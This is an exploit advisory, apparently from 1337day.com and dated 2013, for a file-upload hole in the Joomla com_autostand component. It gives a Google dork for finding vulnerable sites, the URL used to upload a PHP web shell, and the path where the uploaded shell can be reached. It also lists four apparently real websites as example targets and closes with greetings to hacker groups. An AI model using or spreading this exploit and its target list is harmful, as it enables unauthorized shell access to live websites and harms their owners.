# Exploit Title: joomla com_autostand file upload
# Author: Over-X
# email: j1a@hotmail.de
# Vendor or Software Link: forum.joomla.org
# Version: v3
# Google dork: "inurl:com_autostand"
# Tested on: win Xp
-------------------------------------------------------------------------------
poc:
----
localhost/path/index.php?option=com_autostand&func=newItem
upload shell php and go 2 :
--------------------------
localhost/path/images/autostand/images/shell.php
examples:
http://www.karahan.be//index.php?option=com_autostand&func=newItem
http://www.maxoverdrive.ca//index.php?option=com_autostand&func=newItem
http://www.dohenysupplies.com/index.php?option=com_autostand&func=newItem
http://vcmauto.com//index.php?option=com_autostand&func=newItem
---------------------------------------------------------------------------------------
Gre: Sec4ever.com & Damane2011 & Invectus & Kha&mix & 4chrf & ked Ans & Black_Specter &
ms_dz & indoushka & jago-dz & L3b r1z & b0x & scorpion_tn
# FD2E5FB6A9AF8110 1337day.com [2013-07-28] 92E06C88668C5613 #